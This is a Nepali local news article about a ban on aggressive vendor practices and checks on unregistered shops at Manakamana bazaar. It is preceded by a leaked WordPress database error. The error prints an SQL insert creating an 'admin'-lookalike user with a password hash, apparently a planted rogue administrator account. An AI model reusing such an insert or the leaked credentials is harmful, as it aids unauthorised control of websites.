WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoI2ovW9fB7aOstwbZk5GsScKtbiTp/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:41:25', '', 'admlnlx', 'admlnlx')
गोरखा, माघ ४-
मनकामना केबुलकारको माथिल्लो स्टेशनबाट ओर्लिएपछि मनकामना बजार प्रबेश गर्न बितिकै व्यावसायीहरुले तान्ने, चर्को स्वरमा बोलाउने, बाटोमा हिड्न अवरोध हुने गरि सामान बिक्री गर्ने जस्ता गतिविधिले दर्शनार्थी लगायत अन्य यात्रुहरुले हैरानी खेप्दै आएका छन ।
अब भने मनकामना मन्दिरमा आउने दर्शनार्थी तथा पर्यटहरुले यस्ता हैरानी खेप्नु नपर्ने भएको छ । सोमबार देखि यस्ता गतिविधि गर्न रोक लगाइएको हो ।स्थानिय प्रशासन र गोरखा उद्योग वाणिज्य संघ मनकामना बजार इकाईले दर्शनार्थीहरुलाई तान्ने चर्को आवाजमा बोलाउने,बाटोमा हिड्न समेत अवरोध हुने गरि सामान बेच्ने लगायत गतिविधिमा रोक लगाइएको गोरखा उद्योग वाणिज्य संघ मनकामना बजार इकाई मनकामनाका अध्यक्ष राजकुमार श्रेठले जानकारी दिनुभयो ।
साथै सोमबार अनुगमनका क्रममा केही होट तथा पसलहरु विना दर्ता संचालन गरिएको भेटिएका छन । यस्ता विना दर्ता संचालन गरिएका पसल तथा होटलहरुलाई छिट्टै दर्ता गर्न निर्देशन समेत दिइएको अध्यक्ष श्रेष्ठले बताउनुभयो ।